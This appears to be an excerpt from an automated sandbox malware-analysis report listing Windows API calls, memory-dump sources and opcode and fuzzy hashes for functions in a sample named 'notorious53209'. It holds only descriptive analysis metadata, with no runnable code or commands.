                                            • API String ID: 1941087503-1110647743
                                            • Opcode ID: 84afbf112cddd9bd403ca244d8a9a9d66749d553a5f3e1b089d1c7e14468f34f
                                            • Instruction ID: 04e963aa91c8aa3afaa21cdf4454868d14e93e759a2e996ecaf9d161636dd499
                                            • Opcode Fuzzy Hash: 84afbf112cddd9bd403ca244d8a9a9d66749d553a5f3e1b089d1c7e14468f34f
                                            • Instruction Fuzzy Hash: 5D11C3B56202097BEF117F60DC86FEA376C9F48300F0440B6FD08AA092DE7059658F35
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00292048
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                            • API String ID: 3964851224-769500911
                                            • Opcode ID: e0a31bcb4f78f9cba425a22ed9db20193ef99292f7eb35bae7107c08650f7826
                                            • Instruction ID: c8432b38f4cd5e8a8d1cc29d9db0f0fa220e6430ca3e8dfc61fd5e6863be3148
                                            • Opcode Fuzzy Hash: e0a31bcb4f78f9cba425a22ed9db20193ef99292f7eb35bae7107c08650f7826
                                            • Instruction Fuzzy Hash: 6411AD3496010ADFCF40EFA4D9814EEB7B4FF29300F508468DC55AB252EB32A92ACF40
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002AEF1B
                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002AEF4B
                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002AF07E
                                            • CloseHandle.KERNEL32(?), ref: 002AF0FF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                            • String ID:
                                            • API String ID: 2364364464-0
                                            • Opcode ID: a3e9a63e1369ec96e6999c642e5a30ede06d53ef6b26f4bfb9de22ef36221442
                                            • Instruction ID: cb452960170fe11d789d7139491cce3d6fb59e273bf4a8d16b6f0406ec82306a
                                            • Opcode Fuzzy Hash: a3e9a63e1369ec96e6999c642e5a30ede06d53ef6b26f4bfb9de22ef36221442
                                            • Instruction Fuzzy Hash: 938181B16243019FD720DF28CC46B2AB7E5EF49720F14891DF599DB292DBB4AC508F91
                                            APIs
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                              • Part of subcall function 002B10A5: CharUpperBuffW.USER32(?,?), ref: 002B10BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002B0388
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002B03C7
                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002B040E
                                            • RegCloseKey.ADVAPI32(?,?), ref: 002B043A
                                            • RegCloseKey.ADVAPI32(00000000), ref: 002B0447
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                            • String ID:
                                            • API String ID: 3440857362-0
                                            • Opcode ID: 846b56841dc52c5707b182583e961615858612db20b59cf08eb4f8b1d075b01e
                                            • Instruction ID: 6797605f36defb1c0b8759dca590c7dd74d6f6115c1c0108d2416b42656184ca
                                            • Opcode Fuzzy Hash: 846b56841dc52c5707b182583e961615858612db20b59cf08eb4f8b1d075b01e
                                            • Instruction Fuzzy Hash: CA515871228205AFD704EF64D885FAFB7E8BF88344F04896DB595872A1DB70E924CB52
                                            APIs
                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0029E88A
                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0029E8B3
                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0029E8F2
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0029E917
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0029E91F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                            • String ID:
                                            • API String ID: 1389676194-0
                                            • Opcode ID: b9c739c599462fcd9ad30770603f03308be456a9b6d2339b702001ac2b22f40e
                                            • Instruction ID: 18ee45749cd92a2a51269b66234a45de05199e641e4c2ef345c4525ecd1d8f97
                                            • Opcode Fuzzy Hash: b9c739c599462fcd9ad30770603f03308be456a9b6d2339b702001ac2b22f40e
                                            • Instruction Fuzzy Hash: 7D510875A10215EFCF01EF64C985AAEBBF5EF09310F1480A9E849AB361CB71AD61DF50
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 061c403c25933daa7b8ae65a6a0111dc5aef671174a565814d2d8d46fea70e2f
                                            • Instruction ID: c648b98e1f5a829688c619ebec9572e8b5ab931e1c819b02104e356650fb344f
                                            • Opcode Fuzzy Hash: 061c403c25933daa7b8ae65a6a0111dc5aef671174a565814d2d8d46fea70e2f
                                            • Instruction Fuzzy Hash: 1B412635920205AFC720DF28DC48FF9BBE8EB09390F1402A5F955A72E1DB70AD61DB51
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 00232357
                                            • ScreenToClient.USER32(002F67B0,?), ref: 00232374
                                            • GetAsyncKeyState.USER32(00000001), ref: 00232399
                                            • GetAsyncKeyState.USER32(00000002), ref: 002323A7
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AsyncState$ClientCursorScreen
                                            • String ID:
                                            • API String ID: 4210589936-0
                                            • Opcode ID: c2a2b9aab63251fdb897d20ed27ce0690b6dc24e2aa432e8641c09596a51c087
                                            • Instruction ID: 789518049a2f1c27b626523aa74774efce4e44c05bb937f32bfca10d47e18134
                                            • Opcode Fuzzy Hash: c2a2b9aab63251fdb897d20ed27ce0690b6dc24e2aa432e8641c09596a51c087
                                            • Instruction Fuzzy Hash: 8B41B17152411AFBCF15AF68C848AEDBBB4FB05760F20439AFC6892290C77459A4DF91
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028695D
                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 002869A9
                                            • TranslateMessage.USER32(?), ref: 002869D2
                                            • DispatchMessageW.USER32(?), ref: 002869DC
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002869EB
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                            • String ID:
                                            • API String ID: 2108273632-0
                                            • Opcode ID: d456c840ff174af539d50ff3c373be51a06bb69fb25377bf9a29047bc41e24cb
                                            • Instruction ID: 6f0ca3f33f9a2f270d54ec149b74d082635b00b8681ba5ae8214cd0668e65dd3
                                            • Opcode Fuzzy Hash: d456c840ff174af539d50ff3c373be51a06bb69fb25377bf9a29047bc41e24cb
                                            • Instruction Fuzzy Hash: 8231E535922247AADB64EF74EC4CFB6BBACEB01350F144179E821C31E1E77098A5D790
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 00288F12
                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00288FBC
                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00288FC4
                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00288FD2
                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00288FDA
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessagePostSleep$RectWindow
                                            • String ID:
                                            • API String ID: 3382505437-0
                                            • Opcode ID: 4571805cccc1a49a02b75af04fdb1f00580864618385746c9159440146d26af9
                                            • Instruction ID: 79578e1e8f4ad7c5a256f90f9566ec5064e605e7efde934fe36ece425b076262
                                            • Opcode Fuzzy Hash: 4571805cccc1a49a02b75af04fdb1f00580864618385746c9159440146d26af9
                                            • Instruction Fuzzy Hash: 7C31E07151121AEFDB04DF68DE4CA9E7BB6FB14315F508229FA24EA1D0C7B09920CB90
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 0028B6C7
                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0028B6E4
                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0028B71C
                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 0028B742
                                            • _wcsstr.LIBCMT ref: 0028B74C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                            • String ID:
                                            • API String ID: 3902887630-0
                                            • Opcode ID: ea52488f722bc436c492e96f207644e0277991fa1f8a6bce3733fcdb6c98f8d3
                                            • Instruction ID: 6a388d67077ac6b0febb313060d7fdd085129bc0387eaf923efb303234e68da0
                                            • Opcode Fuzzy Hash: ea52488f722bc436c492e96f207644e0277991fa1f8a6bce3733fcdb6c98f8d3
                                            • Instruction Fuzzy Hash: 8421F836625205BAEB166F399D49E7BBB9CDF45720F04402DFC05CA1E1EB61DC609750
                                            APIs
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00289802
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00289834
                                            • __itow.LIBCMT ref: 0028984C
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00289874
                                            • __itow.LIBCMT ref: 00289885
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$__itow$_memmove
                                            • String ID:
                                            • API String ID: 2983881199-0
                                            • Opcode ID: 594882449dcb6afe82f40d240121950b19a666e8d14d6f7c40ec38fe7bf5e6d1
                                            • Instruction ID: 207edba3d39d6684e739a489874e66cddf98d8c254436a30e8bb03c6fec68c13
                                            • Opcode Fuzzy Hash: 594882449dcb6afe82f40d240121950b19a666e8d14d6f7c40ec38fe7bf5e6d1
                                            • Instruction Fuzzy Hash: 9321FB75B21205ABDF20AB658C8AEFE7BACDF4A710F080025FD04D7281D6709DA58B91
                                            APIs
                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0023134D
                                            • SelectObject.GDI32(?,00000000), ref: 0023135C
                                            • BeginPath.GDI32(?), ref: 00231373
                                            • SelectObject.GDI32(?,00000000), ref: 0023139C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ObjectSelect$BeginCreatePath
                                            • String ID:
                                            • API String ID: 3225163088-0
                                            • Opcode ID: ad7a8d1861153a66880efc3afbd514d911495ab974c4bcd7f47df57ee64bc51b
                                            • Instruction ID: 472901250b58a961e9e35fc2daff759536db536240f6b623cf83e467f59aff63
                                            • Opcode Fuzzy Hash: ad7a8d1861153a66880efc3afbd514d911495ab974c4bcd7f47df57ee64bc51b
                                            • Instruction Fuzzy Hash: E8213EB0824309EBDB119F25ED0C7B97BB8EB043A1F14427AE814961A0D77199B9DF90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memcmp
                                            • String ID:
                                            • API String ID: 2931989736-0
                                            • Opcode ID: f3fb710be99d6b954d668955c4985147a1762a8d6b11da2745925b47cc3a6793
                                            • Instruction ID: 4c6fa31e7951d84bb640fe9d3be4f159199c47e11babbc9e4a6ee64a99a09891
                                            • Opcode Fuzzy Hash: f3fb710be99d6b954d668955c4985147a1762a8d6b11da2745925b47cc3a6793
                                            • Instruction Fuzzy Hash: 8E0196B56392067BD204B9245CC6F6B635CDB21398B544115FD08962C3EBB0AE3587F4
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00294D5C
                                            • __beginthreadex.LIBCMT ref: 00294D7A
                                            • MessageBoxW.USER32(?,?,?,?), ref: 00294D8F
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00294DA5
                                            • CloseHandle.KERNEL32(00000000), ref: 00294DAC
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                            • String ID:
                                            • API String ID: 3824534824-0
                                            • Opcode ID: ca431782a35a4c6ba384c25d0beca165e9a300134ee607fdb1b7cb32c3efb9b7
                                            • Instruction ID: 5960c51c59bffcbc155bec288375f07ad258c3a5c509be3ccf4e3d0fddace24e
                                            • Opcode Fuzzy Hash: ca431782a35a4c6ba384c25d0beca165e9a300134ee607fdb1b7cb32c3efb9b7
                                            • Instruction Fuzzy Hash: C3110876914245BBCB019FB8AC0CEAA7FACEB45321F144365FD14D3251D6718D5487B0
                                            APIs
                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00288766
                                            • GetLastError.KERNEL32(?,0028822A,?,?,?), ref: 00288770
                                            • GetProcessHeap.KERNEL32(00000008,?,?,0028822A,?,?,?), ref: 0028877F
                                            • RtlAllocateHeap.NTDLL(00000000,?,0028822A), ref: 00288786
                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0028879D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                            • String ID:
                                            • API String ID: 883493501-0
                                            • Opcode ID: db758abe0210aff58cf7b54be85b926b15dd70ad8e046c78236efb78404fbf1d
                                            • Instruction ID: b6ad9c488260a17785a47ff4d139b43aba70621925c7777553d1e7f2f51f379a
                                            • Opcode Fuzzy Hash: db758abe0210aff58cf7b54be85b926b15dd70ad8e046c78236efb78404fbf1d
                                            • Instruction Fuzzy Hash: 93014F79211205EFDB105FA9ED4CD67BBBCEF853957600569F849C2160DA318C20CB60
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00295502
                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00295510
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00295518
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00295522
                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0029555E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
